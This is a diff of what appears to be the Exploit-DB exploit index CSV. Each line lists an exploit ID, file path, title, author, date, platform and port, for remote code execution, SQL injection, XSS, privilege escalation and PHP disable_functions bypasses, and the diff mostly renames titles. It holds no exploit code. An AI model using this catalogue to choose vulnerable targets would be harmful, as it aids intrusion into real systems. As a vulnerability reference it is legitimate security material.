48072,exploits/php/local/48072.php,"PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass",2020-01-30,mm0r1,local,php,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17992,7 +17997,7 @@ id,file,description,date,author,type,platform,port
48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,
48037,exploits/linux_mips/remote/48037.rb,"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)",2020-02-10,Metasploit,remote,linux_mips,1900
48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
48051,exploits/freebsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,freebsd,
48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd,
48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
@ -36137,7 +36142,7 @@ id,file,description,date,author,type,platform,port
35142,exploits/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",webapps,php,
35143,exploits/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",webapps,php,
35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php,
35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,
35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php,
35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php,
35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443
35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,
@ -37979,7 +37984,7 @@ id,file,description,date,author,type,platform,port
38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php,
38118,exploits/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",webapps,xml,
38119,exploits/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",webapps,php,
38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library",2015-09-10,ylbhz,webapps,php,
38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' disable_functions Bypass / Load Dynamic Library",2015-09-10,ylbhz,webapps,php,
38128,exploits/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",webapps,cgi,5000
38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php,
38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java,
@ -38758,7 +38763,7 @@ id,file,description,date,author,type,platform,port
39761,exploits/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",webapps,php,80
39762,exploits/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",webapps,cgi,80
39765,exploits/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",webapps,cgi,
39766,exploits/php/webapps/39766.php,"Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass",2016-05-04,RicterZ,webapps,php,
39766,exploits/php/webapps/39766.php,"Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass",2016-05-04,RicterZ,webapps,php,
39777,exploits/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",webapps,asp,80
39780,exploits/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",webapps,jsp,443
39781,exploits/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,webapps,php,80
@ -42088,14 +42093,14 @@ id,file,description,date,author,type,platform,port
47438,exploits/php/webapps/47438.txt,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80
47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,
47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' Disable Functions Bypass",2019-09-28,mm0r1,webapps,multiple,
47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple,
47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80
47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80
47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,
47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,
47460,exploits/php/webapps/47460.txt,"LabCollector 5.423 - SQL Injection",2019-10-04,"Carlos Avila",webapps,php,
47462,exploits/php/webapps/47462.php,"PHP 7.0 < 7.3 (Unix) - 'gc' Disable Functions Bypass",2019-10-03,mm0r1,webapps,php,
47462,exploits/php/webapps/47462.php,"PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass",2019-10-03,mm0r1,webapps,php,
47465,exploits/php/webapps/47465.py,"Joomla 3.4.6 - 'configuration.php' Remote Code Execution",2019-10-07,"Alessandro Groppo",webapps,php,
47467,exploits/php/webapps/47467.txt,"Zabbix 4.2 - Authentication Bypass",2019-10-07,"Milad Khoshdel",webapps,php,
47469,exploits/php/webapps/47469.txt,"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting",2019-10-07,Creatigon,webapps,php,
@ -42342,7 +42347,6 @@ id,file,description,date,author,type,platform,port
48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java,
48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,
48022,exploits/php/webapps/48022.txt,"QuickDate 1.3.2 - SQL Injection",2020-02-07,"Ihsan Sencan",webapps,php,
48023,exploits/php/webapps/48023.txt,"VehicleWorkshop 1.0 - 'bookingid' SQL Injection",2020-02-07,"Mehran Feizi",webapps,php,
48024,exploits/php/webapps/48024.txt,"PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection",2020-02-07,"Amel BOUZIANE-LEBLOND",webapps,php,
48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php,
48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml,
@ -42352,9 +42356,5 @@ id,file,description,date,author,type,platform,port
48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
48047,exploits/php/webapps/48047.rb,"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
48058,exploits/php/webapps/48058.txt,"Wordpress Plugin tutor.1.5.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
48059,exploits/php/webapps/48059.txt,"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting",2020-02-13,"Mehran Feizi",webapps,php,
48061,exploits/php/webapps/48061.txt,"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure",2020-02-13,"Mehran Feizi",webapps,php,
48062,exploits/php/webapps/48062.txt,"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload",2020-02-13,"Mehran Feizi",webapps,php,
48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php,
48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
48065,exploits/php/webapps/48065.txt,"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,

Can't render this file because it is too large.